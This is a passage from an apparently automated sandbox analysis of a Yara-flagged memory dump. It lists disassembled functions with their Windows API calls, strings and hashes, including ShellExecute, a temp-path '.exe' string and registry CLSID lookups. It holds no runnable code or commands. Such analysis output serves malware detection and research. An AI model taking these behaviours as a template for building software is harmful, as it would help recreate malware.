                                                                                      • Part of subcall function 04EF24F8: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 04EF2527
                                                                                      • Part of subcall function 04EF24F8: ___AdjustPointer.LIBCMT ref: 04EF2542
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 04EF1ED7
                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 04EF1EE9
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 04EF1F0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 2901542994-0
                                                                                    • Opcode ID: 7da64e4c7d7c3d2aad183759c56d200d60dd74d6309963a0bc7348b47929d19c
                                                                                    • Instruction ID: 0740ce77b06f2314ee0a5073497aec729b96e536937519d8a335555d126d6890
                                                                                    • Opcode Fuzzy Hash: 7da64e4c7d7c3d2aad183759c56d200d60dd74d6309963a0bc7348b47929d19c
                                                                                    • Instruction Fuzzy Hash: 5801253240010CFBDF129F55CC00EEABBBAEF48718F05A114FA1866120D732F861EBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED15B0, Relevance: 6.0, APIs: 4, Instructions: 43timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 04ED15CC
                                                                                    • InterlockedIncrement.KERNEL32(04F06B70), ref: 04ED15E2
                                                                                    • InterlockedIncrement.KERNEL32(04F06B70), ref: 04ED15ED
                                                                                    • timeGetTime.WINMM ref: 04ED1605
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: IncrementInterlockedTimetime
                                                                                    • String ID:
                                                                                    • API String ID: 159728177-0
                                                                                    • Opcode ID: 5811d8b3562114a5215328ca9662abf016d3857e4b6811664028008a14842fc9
                                                                                    • Instruction ID: a8f19660bd540e8f7b09073a4413aea435864f7dcbdb253536fde5ad952865a1
                                                                                    • Opcode Fuzzy Hash: 5811d8b3562114a5215328ca9662abf016d3857e4b6811664028008a14842fc9
                                                                                    • Instruction Fuzzy Hash: 45014CB5A00215AFD700EF6AD404649BBF8FF88315F04411AE409C3640DBB4B861CFD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBA330, Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 04EBA351
                                                                                    • WaitForSingleObject.KERNEL32(04ECB34C,000000FF), ref: 04EBA37A
                                                                                    • CloseHandle.KERNEL32(04ECB34C), ref: 04EBA383
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EBA38F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CreateEventObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 3071945061-0
                                                                                    • Opcode ID: 6b6a4a712a00dd3aa06d6d9aab4a3f50b4a562ecbe82bbfa91389e4327129c75
                                                                                    • Instruction ID: 741b690302e1ddbbc3abd78ed3e27407aeb79bc65086d88f2e374cb8090a54f9
                                                                                    • Opcode Fuzzy Hash: 6b6a4a712a00dd3aa06d6d9aab4a3f50b4a562ecbe82bbfa91389e4327129c75
                                                                                    • Instruction Fuzzy Hash: FDF09671941314BBEB10AB949C0EBFE7A75DB01715F200254FA24791C5DBB529108BC5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6810, Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteDesktopHandleRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3596899788-0
                                                                                    • Opcode ID: eea494397096154e4e0cb39ec876857ae157f5d1332288563a301067daded4f1
                                                                                    • Instruction ID: ccdb73fda4312d6a95a11584415e353fe762c6bc3f4ee251b05828f0374c47d1
                                                                                    • Opcode Fuzzy Hash: eea494397096154e4e0cb39ec876857ae157f5d1332288563a301067daded4f1
                                                                                    • Instruction Fuzzy Hash: 98F03931000601EFEB222F61EC09A46BFF2FF44312B10582DEAEB46524DB35B8A5EF05
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECA8C0, Relevance: 6.0, APIs: 4, Instructions: 15sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 04ECA8C0
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECA8D9
                                                                                    • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 04ECA8E3
                                                                                    • SetConsoleCtrlHandler.KERNEL32(04ECA880,00000001), ref: 04ECA8F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleCountCtrlHandlerParametersProcessShutdownSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 4201418100-0
                                                                                    • Opcode ID: ca5c7e0bf49473d9fe87f725e6ae81f05259261f0639eb6c6ebe845ab7d198b8
                                                                                    • Instruction ID: 7b3c8423b2383e9729628d46dc6f44e17796ec020f09bd956efe786ad52b54a3
                                                                                    • Opcode Fuzzy Hash: ca5c7e0bf49473d9fe87f725e6ae81f05259261f0639eb6c6ebe845ab7d198b8
                                                                                    • Instruction Fuzzy Hash: 02D0A932388300ABE3001BB29D8EB983620E794B03F801634F703D88C8CEA928439B16
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EDD7C7, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 04EDD7C7
                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 04EDD7CC
                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 04EDD7D1
                                                                                      • Part of subcall function 04EDE361: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 04EDE372
                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 04EDD7E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                    • String ID:
                                                                                    • API String ID: 1761009282-0
                                                                                    • Opcode ID: 4b34d1eb559c58132cd85e065138e547ebf45c6fd312b7828b6112a98e728dee
                                                                                    • Instruction ID: 628986907778f7b07255783bb3d8e9625d8deafb09a469319fdab21e6f2db11f
                                                                                    • Opcode Fuzzy Hash: 4b34d1eb559c58132cd85e065138e547ebf45c6fd312b7828b6112a98e728dee
                                                                                    • Instruction Fuzzy Hash: 56C04818000F02957E203FB96A2DABE03402F5218DB89B8C5C8A91F9429A06300B2873
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE9649, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 04EE97B5
                                                                                      • Part of subcall function 04EDEB43: IsProcessorFeaturePresent.KERNEL32(00000017,04EDEB15,00000000,00000001,00000004,00000000,00000001,00000001,?,?,04EDEB22,00000000,00000000,00000000,00000000,00000000), ref: 04EDEB45
                                                                                      • Part of subcall function 04EDEB43: GetCurrentProcess.KERNEL32(C0000417,00000001), ref: 04EDEB67
                                                                                      • Part of subcall function 04EDEB43: TerminateProcess.KERNEL32(00000000), ref: 04EDEB6E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                    • String ID: *?$.
                                                                                    • API String ID: 2667617558-3972193922
                                                                                    • Opcode ID: 2be3bc7b6416036c845c84843d5f87116fbda7866d4dcdc9c4ced2ae4b89c846
                                                                                    • Instruction ID: a466e7479916260f54227fb45d608ee8346ddf4bac3c7923ded1102799be4328
                                                                                    • Opcode Fuzzy Hash: 2be3bc7b6416036c845c84843d5f87116fbda7866d4dcdc9c4ced2ae4b89c846
                                                                                    • Instruction Fuzzy Hash: 7B5194B5E0020ADFDF14DFAAC880ABDBBF5EF48318F24516AD854E7341E675AA058B50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB2DB0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(04EF6FD0,00000000,00000001,04EF7070,00000004,0000002C,000002E8,00000000), ref: 04EB2DFC
                                                                                    • SysFreeString.OLEAUT32(?), ref: 04EB2EE2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFreeInstanceString
                                                                                    • String ID: FriendlyName
                                                                                    • API String ID: 586785272-3623505368
                                                                                    • Opcode ID: 3500dab3fc1c119b80acad08d2e36ed54ec2933bff4f70ccb0c2f2ef1b5dfa17
                                                                                    • Instruction ID: 1214b34669aaa9fd2f858885682080df05139d7653dfbac423de818c4859f9c1
                                                                                    • Opcode Fuzzy Hash: 3500dab3fc1c119b80acad08d2e36ed54ec2933bff4f70ccb0c2f2ef1b5dfa17
                                                                                    • Instruction Fuzzy Hash: 80511C71A002099FDB14DFA5CC98FEFB7B5EF48704F1495A8E945AB250D775A801CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB2F60, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(Function_00046FD0,00000000,00000001,04EF7070,00000000,?,?,?,?,?,?,04EB295F,?,?), ref: 04EB2F9A
                                                                                    • SysFreeString.OLEAUT32(04EB295F), ref: 04EB3040
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFreeInstanceString
                                                                                    • String ID: FriendlyName
                                                                                    • API String ID: 586785272-3623505368
                                                                                    • Opcode ID: 67566cba2df85150eb2ef6099982a4d1e46a8acabbf39a1dccd9b14ea3037f2c
                                                                                    • Instruction ID: 4d092de97357517b8d745706f7bf398fab0dda5ad3c659bfd5b5ee3f3dbc8516
                                                                                    • Opcode Fuzzy Hash: 67566cba2df85150eb2ef6099982a4d1e46a8acabbf39a1dccd9b14ea3037f2c
                                                                                    • Instruction Fuzzy Hash: FA411C74700209AFDB14CFA5CC89FAAB7B9BF88748F1495A8F945DB280D771E941CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC76F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04EC7809
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 909987262-4289949731
                                                                                    • Opcode ID: f90950447c47e07d0091a3a7176cddca7e54a68dbc2e1644414f75f7434391a4
                                                                                    • Instruction ID: 14c776e27e754bdc589cf29925fbe2215d2fab9249c2f5d67c55b2a6f2ddda8f
                                                                                    • Opcode Fuzzy Hash: f90950447c47e07d0091a3a7176cddca7e54a68dbc2e1644414f75f7434391a4
                                                                                    • Instruction Fuzzy Hash: 1D31F8323403198FD3249F6CE940A56F7E9EF94716B20192FE555CB641D771B841CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED4DE0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 04ED4EB9
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 04ED4EE1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementIncrement
                                                                                    • String ID: paw
                                                                                    • API String ID: 2172605799-712274330
                                                                                    • Opcode ID: 4b54e4460e1f9ea753e524ce62867c6f65738aa524830bfc01bf95be472bfd3a
                                                                                    • Instruction ID: 113dacc1459d156331baacbe2143a75e39654261f421fe66549070500ef84396
                                                                                    • Opcode Fuzzy Hash: 4b54e4460e1f9ea753e524ce62867c6f65738aa524830bfc01bf95be472bfd3a
                                                                                    • Instruction Fuzzy Hash: 6541B071A0062AABDB25DFA8C5806A9B7A0FF58314F546269DD55AB2C0E730FD12CBC0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED47D0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04ED48BD
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04ED48C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: vector<T> too long
                                                                                    • API String ID: 909987262-3788999226
                                                                                    • Opcode ID: 32f256fa6fe89637a07f986ee80c87ee4ca206d5d937f6679e8bd3fd665ec823
                                                                                    • Instruction ID: 1f49d734e4ce6ce137d694bfe29da20455f0d32a5cbc0be33c77cbb5eebfa675
                                                                                    • Opcode Fuzzy Hash: 32f256fa6fe89637a07f986ee80c87ee4ca206d5d937f6679e8bd3fd665ec823
                                                                                    • Instruction Fuzzy Hash: B9318F357006468FCB2C8F7DCDE542AB7D2FB942A4328DA3DE59ACB684D671F8428644
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB9D70, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EB7970: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,04ECB4C6), ref: 04EB79A0
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 04EB79B2
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 04EB79C5
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 04EB79D8
                                                                                    • CreateEventW.KERNEL32(00000000,00000001), ref: 04EB9E41
                                                                                    • CloseHandle.KERNEL32(04EFD8B0,00000000,00000001,0000003F), ref: 04EB9E9B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                                                    • String ID: C
                                                                                    • API String ID: 1850149996-1037565863
                                                                                    • Opcode ID: ea73c928f3f8ea54b73d228bda81c5e9676d4b23ce5ff0171f806e34b89136ab
                                                                                    • Instruction ID: 48b53711d244342bfa2f8cce7de97d66e271c5e7dd5b146cea0b1d56882c1797
                                                                                    • Opcode Fuzzy Hash: ea73c928f3f8ea54b73d228bda81c5e9676d4b23ce5ff0171f806e34b89136ab
                                                                                    • Instruction Fuzzy Hash: 344145B01083419BE710DF64D859B5BBBE4BF80758F101A1CFAA18A290DB75E908CFD3
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB9820, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EB7970: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,04ECB4C6), ref: 04EB79A0
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 04EB79B2
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 04EB79C5
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 04EB79D8
                                                                                    • WaitForSingleObject.KERNEL32(?), ref: 04EB9915
                                                                                    • CloseHandle.KERNEL32(04EFC858), ref: 04EB9935
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CloseHandleLibraryLoadObjectSingleWait
                                                                                    • String ID: C
                                                                                    • API String ID: 2253563908-1037565863
                                                                                    • Opcode ID: 4d82c7ad3f3649f7d376d22af80c297d135ef1058f188b9f1353dd9878a1bccf
                                                                                    • Instruction ID: f355fc94e55e6d6082e824a03a715cd121679fcf04037c216c359dd9c58ab11a
                                                                                    • Opcode Fuzzy Hash: 4d82c7ad3f3649f7d376d22af80c297d135ef1058f188b9f1353dd9878a1bccf
                                                                                    • Instruction Fuzzy Hash: F74139B01083459BE710DF64D858B5BBBE4FF81358F10591CFAA18A2A1D775E848CF93
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB5B90, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB5C4A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 909987262-4289949731
                                                                                    • Opcode ID: a27198a0dbeb80432640f9151740c11b8516eda69e5afb42310db9284bb69c7f
                                                                                    • Instruction ID: 51885a984b3eb879a03093766175b538e9659997e065620d5be4cc10fb206fb1
                                                                                    • Opcode Fuzzy Hash: a27198a0dbeb80432640f9151740c11b8516eda69e5afb42310db9284bb69c7f
                                                                                    • Instruction Fuzzy Hash: E0219271300209AF9724DF69D8D099AB3EAFF94718354593DE985CB210DB70F815CBE4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED5240, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04ED527C
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04ED52E4
                                                                                      • Part of subcall function 04ED665F: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04ED666B
                                                                                      • Part of subcall function 04ED665F: __CxxThrowException@8.LIBVCRUNTIME ref: 04ED6679
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CompareException@8ExchangeInterlockedObjectSingleSwitchThreadThrowWaitXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                    • String ID: list<T> too long
                                                                                    • API String ID: 2768081694-4027344264
                                                                                    • Opcode ID: b55b41e70fff35da1279092429fc3d6de88ba4f80dbeb9eab7aea330d79bfcd7
                                                                                    • Instruction ID: dadc16cd8e28b3ce7b2d831452269102cc20bc53cecf6b83db8d54b1aa149cdc
                                                                                    • Opcode Fuzzy Hash: b55b41e70fff35da1279092429fc3d6de88ba4f80dbeb9eab7aea330d79bfcd7
                                                                                    • Instruction Fuzzy Hash: D3119471200605AFCB14DF69C880996F7F8FF48314B149629ED6ADB755DB30F846CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBE330, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04EBE355
                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000001,00000000,00000001), ref: 04EBE3C9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExecuteShellSleep
                                                                                    • String ID: open
                                                                                    • API String ID: 4194306370-2758837156
                                                                                    • Opcode ID: f33827e0c126d62ccc82154b06c3795ad2620a97c727ccc8c0c87b229a27214d
                                                                                    • Instruction ID: 495c695b433da9e26734dd9b278ecde0e24c08c29948920837bce7d753238d55
                                                                                    • Opcode Fuzzy Hash: f33827e0c126d62ccc82154b06c3795ad2620a97c727ccc8c0c87b229a27214d
                                                                                    • Instruction Fuzzy Hash: F911B4716003449FE7249F2DCC50BBA77E5AB88709F141869E5CA4B281E676F844CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBE0A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,00000000), ref: 04EBE0CA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: PathTemp
                                                                                    • String ID: .exe$\
                                                                                    • API String ID: 2920410445-2920562713
                                                                                    • Opcode ID: f7f53315ed06e04aa54450418e9ce45430df598f81fe1045ce1e5b1bb615f2b6
                                                                                    • Instruction ID: 49e64954d53fa3c34647dc202d7b2ede3738fd790fbe3b302f12ea6cb3e86cfb
                                                                                    • Opcode Fuzzy Hash: f7f53315ed06e04aa54450418e9ce45430df598f81fe1045ce1e5b1bb615f2b6
                                                                                    • Instruction Fuzzy Hash: 8F114872900209ABEB206F98CC45BEB7BB8EF41319F049179E9495F740E7B0BD0583E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC95F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC9624
                                                                                      • Part of subcall function 04EC0C20: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,04EC963F,?,?), ref: 04EC0C33
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Open$CloseQueryValuewsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 734024169-1865207932
                                                                                    • Opcode ID: c6800787b3d1222fce75918e4a1f6a552610a3a4c35b43b34c643ea6f385262f
                                                                                    • Instruction ID: df138f5e9d3d9e168e60b2a2a402b005a3cb9dc7840a8a6323be7657f74393b1
                                                                                    • Opcode Fuzzy Hash: c6800787b3d1222fce75918e4a1f6a552610a3a4c35b43b34c643ea6f385262f
                                                                                    • Instruction Fuzzy Hash: D401B8309081059BC324DFB89D508BDBFB9EF8520CF2002EEC4568F203E932AA0BC791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBE630, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,04EBE839), ref: 04EBE67E
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,04EBE839), ref: 04EBE683
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                    • String ID: stop
                                                                                    • API String ID: 528846559-3109426870
                                                                                    • Opcode ID: eb1136f9f23268e9f09579156800e64b12609a75f5c97e6bfefc64422c4e1092
                                                                                    • Instruction ID: aa2602e592b25cbdd8181ee9c7f01a79b7bf4510b29cc96fb67491adc7a4a36d
                                                                                    • Opcode Fuzzy Hash: eb1136f9f23268e9f09579156800e64b12609a75f5c97e6bfefc64422c4e1092
                                                                                    • Instruction Fuzzy Hash: D5018136601202AFEB10DF19D884BD6B7A5FF48328F045614E89997A94C775FC90CBD5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBE520, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,04EBE258,00000000,04EBF095,00000000,00000000,?,?,00000001), ref: 04EBE55A
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EBE563
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                    • String ID: stop
                                                                                    • API String ID: 528846559-3109426870
                                                                                    • Opcode ID: a544c5e998cf866f3cd254b72dd47d9f74c5c868df4e83d3a8013bde878d09ba
                                                                                    • Instruction ID: 68091ea15c2a93e61a053301585211dd297f122a3cbc9a7063b6b5ad64e2bd50
                                                                                    • Opcode Fuzzy Hash: a544c5e998cf866f3cd254b72dd47d9f74c5c868df4e83d3a8013bde878d09ba
                                                                                    • Instruction Fuzzy Hash: C4F01D705027008BE7209F69D848B937AE4BF48318F005A1CE5DAC6690EB75F8808B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC886E, Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32 ref: 04EC8898
                                                                                    • HeapAlloc.KERNEL32(03390000,00000000,?), ref: 04EC88A8
                                                                                    • GetProcessHeap.KERNEL32 ref: 04EC88FC
                                                                                    • HeapAlloc.KERNEL32(03390000,00000000,?), ref: 04EC890C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
